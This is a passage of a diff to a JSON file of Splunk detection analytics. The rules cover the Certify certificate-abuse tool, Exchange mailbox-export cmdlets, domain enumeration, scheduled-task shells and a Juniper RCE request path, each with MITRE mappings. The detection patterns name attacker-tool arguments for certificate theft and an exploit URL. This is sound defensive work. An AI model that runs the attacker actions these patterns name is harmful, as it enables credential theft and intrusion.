(Processes.parent_process_name = \"cmd.exe\" OR Processes.parent_process_name = \"powershell*\" OR Processes.parent_process_name=\"pwsh.exe\" OR Processes.parent_process_name = \"explorer.exe\") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process_id Processes.process Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmdline_tool_not_executed_in_cmd_shell_filter`", + "name": "Detect Certify With PowerShell Script Block Logging", + "description": "The following analytic identifies when the attacker tool Certify is used through an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments for the binary version of this tools are similar to PowerShell calls and perform near identical enumeration or exploitation functions.", + "search": "`powershell` EventCode=4104 (ScriptBlockText IN (\"*find *\") AND ScriptBlockText IN (\"* /vulnerable*\",\"* -vulnerable*\",\"* /enrolleeSuppliesSubject *\",\"* /json /outfile*\")) OR (ScriptBlockText IN (,\"*auth *\",\"*req *\",) AND ScriptBlockText IN (\"* -ca *\",\"* -username *\",\"* -u *\")) OR (ScriptBlockText IN (\"*request *\",\"*download *\") AND ScriptBlockText IN (\"* /ca:*\")) | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command Values(OpCode) as reason values(Path) as file_name values(UserID) as user by _time Computer EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval file_name = case(isnotnull(file_name),file_name,true(),\"unknown\") | eval signature = substr(command,0,256) | rename Computer as dest,EventCode as signature_id | `detect_certify_with_powershell_script_block_logging_filter`", "tags": { - "name": "Cmdline Tool Not Executed In CMD Shell", + "name": "Detect Certify With PowerShell Script Block Logging", "analytic_story": [ - "FIN7", - "Qakbot", - "CISA AA22-277A", - "Qakbot", - "Volt Typhoon" + "Windows Certificate Services", + "Malicious PowerShell" ], "asset_type": "Endpoint", "cis20": [ "CIS 10" ], "kill_chain_phases": [ + "Exploitation", "Installation" ], - "message": "A non-standard parent process $parent_process_name$ spawned child process $process_name$ to execute command-line tool on $dest$.", + "message": "Certify arguments through PowerShell detected on $dest$.", "mitre_attack_id": [ + "T1649", "T1059", - "T1059.007" + "T1059.001" ], "nist": [ "DE.CM" @@ -379091,37 +382727,40 @@ "observable": [ { "name": "dest", - "type": "Endpoint", + "type": "Hostname", "role": [ "Victim" ] }, { "name": "user", - "type": "User", + "type": "User Name", "role": [ "Victim" ] }, { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", + "name": "command", "type": "Process", "role": [ - "Child Process" + "Attacker" ] } ], - "risk_score": 56, + "risk_score": 90, "security_domain": "endpoint", - "risk_severity": "medium", + "risk_severity": "high", "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1649", + "mitre_attack_technique": "Steal or Forge Authentication Certificates", + "mitre_attack_tactics": [ + "Credential Access" + ], + "mitre_attack_groups": [ + "APT29" + ] + }, { "mitre_attack_id": "T1059", "mitre_attack_technique": "Command and Scripting Interpreter", @@ -379146,30 +382785,75 @@ ] }, { - "mitre_attack_id": "T1059.007", - "mitre_attack_technique": "JavaScript", + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", "mitre_attack_tactics": [ "Execution" ], "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", "Earth Lusca", "Ember Bear", - "Evilnum", + "FIN10", "FIN6", "FIN7", - "Higaisa", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", "Indrik Spider", "Kimsuky", + "Lazarus Group", "LazyScripter", - "Leafminer", + "Leviathan", + "Magic Hound", "Molerats", "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", "Sidewinder", "Silence", + "Stealth Falcon", + "TA459", "TA505", - "Turla" + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" ] } ] @@ -379802,7 +383486,7 @@ { "name": "Exchange PowerShell Module Usage", "description": "The following analytic identifies the usage of Exchange PowerShell modules that were recently used for a proof of concept related to ProxyShell. Adversaries may abuse a limited set of PwSh Modules related to Exchange once gained access via ProxyShell or ProxyNotShell.\\\nInherently, the usage of the modules is not malicious, but reviewing parallel processes, and user, of the session will assist with determining the intent. \\\nModule - New-MailboxExportRequest will begin the process of exporting contents of a primary mailbox or archive to a .pst file. \\\nModule - New-managementroleassignment can assign a management role to a management role group, management role assignment policy, user, or universal security group (USG). \\\nModule - New-MailboxSearch cmdlet to create a mailbox search and either get an estimate of search results, place search results on In-Place Hold or copy them to a Discovery mailbox. You can also place all contents in a mailbox on hold by not specifying a search query, which accomplishes similar results as Litigation Hold. \\ Module - Get-Recipient cmdlet to view existing recipient objects in your organization. This cmdlet returns all mail-enabled objects (for example, mailboxes, mail users, mail contacts, and distribution groups).", - "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*New-MailboxExportRequest*\", \"*New-ManagementRoleAssignment*\", \"*New-MailboxSearch*\", \"*Get-Recipient*\", \"Search-Mailbox\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `exchange_powershell_module_usage_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*New-MailboxExportRequest*\", \"*New-ManagementRoleAssignment*\", \"*New-MailboxSearch*\", \"*Get-Recipient*\", \"Search-Mailbox\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest |rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `exchange_powershell_module_usage_filter`", "tags": { "name": "Exchange PowerShell Module Usage", "analytic_story": [ @@ -380263,7 +383947,7 @@ "Delivery", "Installation" ], - "message": "An increase of Living Off The Land behavior has been detected on $affected_systems$", + "message": "An increase of Living Off The Land behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1105", "T1190", @@ -380275,7 +383959,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -381023,7 +384707,7 @@ { "name": "MS Scripting Process Loading Ldap Module", "description": "This search is to detect a suspicious MS scripting process such as wscript.exe or cscript.exe that loading ldap module to process ldap query. This behavior was seen in FIN7 implant where it uses javascript to execute ldap query to parse host information that will send to its C2 server. this anomaly detections is a good initial step to hunt further a suspicious ldap query or ldap related events to the host that may give you good information regarding ldap or AD information processing or might be a attacker.", - "search": "`sysmon` EventCode =7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\Wldap32.dll\", \"*\\\\adsldp.dll\", \"*\\\\adsldpc.dll\") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_ldap_module_filter`", + "search": "`sysmon` EventCode =7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\Wldap32.dll\", \"*\\\\adsldp.dll\", \"*\\\\adsldpc.dll\") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_ldap_module_filter`", "tags": { "name": "MS Scripting Process Loading Ldap Module", "analytic_story": [ @@ -381113,7 +384797,7 @@ { "name": "MS Scripting Process Loading WMI Module", "description": "This search is to detect a suspicious MS scripting process such as wscript.exe or cscript.exe that loading wmi module to process wmi query. This behavior was seen in FIN7 implant where it uses javascript to execute wmi query to parse host information that will send to its C2 server. this anomaly detections is a good initial step to hunt further a suspicious wmi query or wmi related events to the host that may give you good information regarding process that are commonly using wmi query or modules or might be an attacker using this technique.", - "search": "`sysmon` EventCode =7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\fastprox.dll\", \"*\\\\wbemdisp.dll\", \"*\\\\wbemprox.dll\", \"*\\\\wbemsvc.dll\" , \"*\\\\wmiutils.dll\", \"*\\\\wbemcomn.dll\") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_wmi_module_filter`", + "search": "`sysmon` EventCode =7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\fastprox.dll\", \"*\\\\wbemdisp.dll\", \"*\\\\wbemprox.dll\", \"*\\\\wbemsvc.dll\" , \"*\\\\wmiutils.dll\", \"*\\\\wbemcomn.dll\") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_wmi_module_filter`", "tags": { "name": "MS Scripting Process Loading WMI Module", "analytic_story": [ @@ -381344,7 +385028,8 @@ "analytic_story": [ "Malicious PowerShell", "Hermetic Wiper", - "Data Destruction" + "Data Destruction", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -381799,7 +385484,7 @@ { "name": "PowerShell Domain Enumeration", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \\\nThis analytic identifies specific PowerShell modules typically used to enumerate an organizations domain or users. \\\nDuring triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.", - "search": "`powershell` EventCode=4104 ScriptBlockText IN (*get-netdomaintrust*, *get-netforesttrust*, *get-addomain*, *get-adgroupmember*, *get-domainuser*) | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_domain_enumeration_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (*get-netdomaintrust*, *get-netforesttrust*, *get-addomain*, *get-adgroupmember*, *get-domainuser*) | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_domain_enumeration_filter`", "tags": { "name": "PowerShell Domain Enumeration", "analytic_story": [ @@ -381814,7 +385499,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "A suspicious powershell script contains domain enumeration command in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$", + "message": "A suspicious powershell script contains domain enumeration command in $ScriptBlockText$ with EventCode $EventCode$ in host $dest$", "mitre_attack_id": [ "T1059", "T1059.001" @@ -381824,14 +385509,14 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] }, { - "name": "UserID", + "name": "user", "type": "User", "role": [ "Victim" @@ -382870,7 +386555,7 @@ { "name": "Powershell Using memory As Backing Store", "description": "The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using memory stream as new object backstore. The malicious PowerShell script will contain stream flate data and will be decompressed in memory to run or drop the actual payload. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.", - "search": "`powershell` EventCode=4104 ScriptBlockText = *New-Object* ScriptBlockText = *IO.MemoryStream* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_using_memory_as_backing_store_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText = *New-Object* ScriptBlockText = *IO.MemoryStream* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_using_memory_as_backing_store_filter`", "tags": { "name": "Powershell Using memory As Backing Store", "analytic_story": [ @@ -382886,7 +386571,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "A PowerShell script contains memorystream command in $ScriptBlockText$ as new object backstore with EventCode $EventCode$ on host $Computer$.", + "message": "A PowerShell script contains memorystream command in $ScriptBlockText$ as new object backstore with EventCode $EventCode$ on host $dest$.", "mitre_attack_id": [ "T1059.001", "T1059" @@ -382896,14 +386581,14 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] }, { - "name": "UserID", + "name": "user", "type": "User", "role": [ "Victim" @@ -385006,7 +388691,7 @@ { "name": "Windows Powershell Import Applocker Policy", "description": "The following analytic is to identify the imports of Windows PowerShell Applocker commandlets. This technique was seen in Azorult malware where it drops an xml Applocker policy that will deny several AV product and then loaded using PowerShell Applocker commandlet.", - "search": "`powershell` EventCode=4104 ScriptBlockText=\"*Import-Module Applocker*\" ScriptBlockText=\"*Set-AppLockerPolicy *\" ScriptBlockText=\"* -XMLPolicy *\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_import_applocker_policy_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText=\"*Import-Module Applocker*\" ScriptBlockText=\"*Set-AppLockerPolicy *\" ScriptBlockText=\"* -XMLPolicy *\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_import_applocker_policy_filter`", "tags": { "name": "Windows Powershell Import Applocker Policy", "analytic_story": [ @@ -385020,7 +388705,7 @@ "Installation", "Exploitation" ], - "message": "A PowerShell script contains Import Applocker Policy command $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$", + "message": "A PowerShell script contains Import Applocker Policy command $ScriptBlockText$ with EventCode $EventCode$ on host $dest$", "mitre_attack_id": [ "T1059.001", "T1059", @@ -385032,14 +388717,14 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -385185,6 +388870,148 @@ ] } }, + { + "name": "Windows Powershell RemoteSigned File", + "description": "This analytic identifies the use of \"remotesigned\" execution policy for a file. This security setting determines whether PowerShell scripts can be executed on a computer. When the execution policy is set to \"remotesigned,\" it allows locally created scripts to run without any restrictions, but scripts downloaded from the internet must have a digital signature from a trusted publisher.", + "search": "| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=\"* remotesigned *\" Processes.process=\"* -File *\" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_remotesigned_file_filter`", + "tags": { + "name": "Windows Powershell RemoteSigned File", + "analytic_story": [ + "Amadey" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation" + ], + "message": "A PowerShell commandline with remotesigned policy executed on $dest$", + "mitre_attack_id": [ + "T1059.001", + "T1059" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] + } + ] + } + }, { "name": "Windows PowerShell ScheduleTask", "description": "The following analytic detects potential malicious activities related to PowerShell's task scheduling cmdlets. It looks for anomalies in PowerShell logs, specifically EventCode 4104, associated with script block logging. The analytic flags unusual or suspicious use patterns of key task-related cmdlets such as 'New-ScheduledTask', 'Set-ScheduledTask', and others, which are often used by attackers for persistence and remote execution of malicious code. If a true positive is found, it suggests an possible attacker is attempting to persist within the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. To implement this analytic, PowerShell Script Block Logging needs to be enabled on some or all endpoints. Analysts should be aware of benign administrative tasks that can trigger alerts and tune the analytic accordingly to reduce false positives. Upon triage, review the PowerShell logs for any unusual or unexpected cmdlet usage, IP addresses, user accounts, or timestamps. If these factors align with known malicious behavior patterns, immediate mitigation steps, such as isolation of the affected systems, user account changes, and relevant threat hunting activities, should be initiated. This proactive analysis significantly enhances an organization's capacity to swiftly respond to, and potentially prevent, the execution of advanced persistent threats in their network.", @@ -385386,24 +389213,160 @@ } }, { - "name": "Windows PowerShell WMI Win32 ScheduledJob", - "description": "The following analytic detects the use of the PowerShell script block logging mechanism to detect the use of the Win32_ScheduledJob WMI class. This class allows the creation and management of scheduled tasks on Windows systems. However, due to security concerns, the class has been disabled by default in Windows systems, and its use must be explicitly enabled by modifying the registry. As a result, the detection of the use of this class may indicate malicious activity, especially if the class was enabled on the system by the attacker. Therefore, it is recommended to monitor the use of Win32_ScheduledJob through PowerShell script block logging and to investigate any suspicious activity.", - "search": "`powershell` EventCode=4104 ScriptBlockText=\"*win32_scheduledjob*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_wmi_win32_scheduledjob_filter`", + "name": "Windows PowerShell WMI Win32 ScheduledJob", + "description": "The following analytic detects the use of the PowerShell script block logging mechanism to detect the use of the Win32_ScheduledJob WMI class. This class allows the creation and management of scheduled tasks on Windows systems. However, due to security concerns, the class has been disabled by default in Windows systems, and its use must be explicitly enabled by modifying the registry. As a result, the detection of the use of this class may indicate malicious activity, especially if the class was enabled on the system by the attacker. Therefore, it is recommended to monitor the use of Win32_ScheduledJob through PowerShell script block logging and to investigate any suspicious activity.", + "search": "`powershell` EventCode=4104 ScriptBlockText=\"*win32_scheduledjob*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_wmi_win32_scheduledjob_filter`", + "tags": { + "name": "Windows PowerShell WMI Win32 ScheduledJob", + "analytic_story": [ + "Active Directory Lateral Movement" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation" + ], + "message": "PowerShell attempting to create a task via WMI - Win32_ScheduledJob, was ran on $dest$.", + "mitre_attack_id": [ + "T1059.001", + "T1059" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 40, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] + } + ] + } + }, + { + "name": "Windows Scheduled Task Service Spawned Shell", + "description": "The following analytic identifies when the Task Scheduler service \"svchost.exe -k netsvcs -p -s Schedule\" is the parent process to common command line, scripting, or shell execution binaries. Attackers often abuse the task scheduler service with these binaries as an execution and persistence mechanism in order to blend in with normal Windows operations. This TTP is also commonly seen for legitimate purposes such as business scripts or application updates.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process=\"*\\\\system32\\\\svchost.exe*\" AND Processes.parent_process=\"*-k*\" AND Processes.parent_process= \"*netsvcs*\" AND Processes.parent_process=\"*-p*\" AND Processes.parent_process=\"*-s*\" AND Processes.parent_process=\"*Schedule*\" Processes.process_name IN(\"powershell.exe\", \"wscript.exe\", \"cscript.exe\", \"cmd.exe\", \"sh.exe\", \"ksh.exe\", \"zsh.exe\", \"bash.exe\", \"scrcons.exe\",\"pwsh.exe\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_scheduled_task_service_spawned_shell_filter`", "tags": { - "name": "Windows PowerShell WMI Win32 ScheduledJob", + "name": "Windows Scheduled Task Service Spawned Shell", "analytic_story": [ - "Active Directory Lateral Movement" + "Windows Persistence Techniques" ], "asset_type": "Endpoint", "cis20": [ "CIS 10" ], "kill_chain_phases": [ - "Installation" + "Installation", + "Exploitation" ], - "message": "PowerShell attempting to create a task via WMI - Win32_ScheduledJob, was ran on $dest$.", + "message": "A windows scheduled task spawned the shell application $process_name$ on $dest$.", "mitre_attack_id": [ - "T1059.001", + "T1053.005", "T1059" ], "nist": [ @@ -385412,84 +389375,79 @@ "observable": [ { "name": "dest", - "type": "Hostname", + "type": "Endpoint", "role": [ "Victim" ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "process", + "type": "Process Name", + "role": [ + "Attacker" + ] } ], - "risk_score": 40, + "risk_score": 20, "security_domain": "endpoint", "risk_severity": "low", "mitre_attack_enrichments": [ { - "mitre_attack_id": "T1059.001", - "mitre_attack_technique": "PowerShell", + "mitre_attack_id": "T1053.005", + "mitre_attack_technique": "Scheduled Task", "mitre_attack_tactics": [ - "Execution" + "Execution", + "Persistence", + "Privilege Escalation" ], "mitre_attack_groups": [ - "APT19", - "APT28", + "APT-C-36", "APT29", "APT3", "APT32", "APT33", + "APT37", "APT38", "APT39", "APT41", - "Aquatic Panda", + "BITTER", "BRONZE BUTLER", "Blue Mockingbird", "Chimera", "Cobalt Group", "Confucius", - "CopyKittens", - "DarkHydrus", - "DarkVishnya", - "Deep Panda", "Dragonfly", - "Earth Lusca", - "Ember Bear", "FIN10", "FIN6", "FIN7", "FIN8", "Fox Kitten", "GALLIUM", - "GOLD SOUTHFIELD", - "Gallmaker", "Gamaredon Group", - "Gorgon Group", - "HAFNIUM", "HEXANE", - "Inception", - "Indrik Spider", + "Higaisa", "Kimsuky", "Lazarus Group", - "LazyScripter", - "Leviathan", + "LuminousMoth", + "Machete", "Magic Hound", "Molerats", "MuddyWater", "Mustang Panda", - "Nomadic Octopus", + "Naikon", "OilRig", "Patchwork", - "Poseidon Group", - "Sandworm Team", - "Sidewinder", + "Rancor", "Silence", "Stealth Falcon", - "TA459", - "TA505", "TEMP.Veles", - "TeamTNT", - "Threat Group-3390", - "Thrip", - "Tonto Team", - "Turla", - "WIRTE", "Wizard Spider", "menuPass" ] @@ -385622,6 +389580,192 @@ } ] } + }, + { + "name": "Juniper Networks Remote Code Execution Exploit Detection", + "description": "The following analytic detects the exploitation of a remote code execution vulnerability in Juniper Networks devices. The vulnerability involves multiple steps, including uploading a malicious PHP file and an INI file to the target server, and then executing the PHP code by manipulating the PHP configuration via the uploaded INI file. The analytic specifically looks for requests to /webauth_operation.php?PHPRC=*, which are used to upload the files and execute the code, respectively. This behavior is worth identifying for a SOC because it indicates that an attacker is attempting to exploit the vulnerability to gain unauthorized access to the device and execute arbitrary code. If a true positive is found, it suggests that an attacker has successfully exploited the vulnerability and may have gained control over the device, leading to data theft, network compromise, or other damaging outcomes. Upon triage, review the request parameters and the response to determine if the exploitation was successful. Capture and inspect any relevant network traffic and server logs to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*/webauth_operation.php?PHPRC=*\") Web.status=200 by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `juniper_networks_remote_code_execution_exploit_detection_filter`", + "tags": { + "name": "Juniper Networks Remote Code Execution Exploit Detection", + "analytic_story": [ + "Juniper JunOS Remote Code Execution" + ], + "asset_type": "Web server", + "cis20": [ + "CIS 13" + ], + "kill_chain_phases": [ + "Delivery", + "Command And Control", + "Installation" + ], + "message": "This analytic has identified a potential exploitation of a remote code execution vulnerability in Juniper Networks devices on $dest$ on the URL $url$ used for the exploit.", + "mitre_attack_id": [ + "T1190", + "T1105", + "T1059" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "url", + "type": "URL String", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 72, + "security_domain": "network", + "risk_severity": "medium", + "atomic_guid": [], + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + 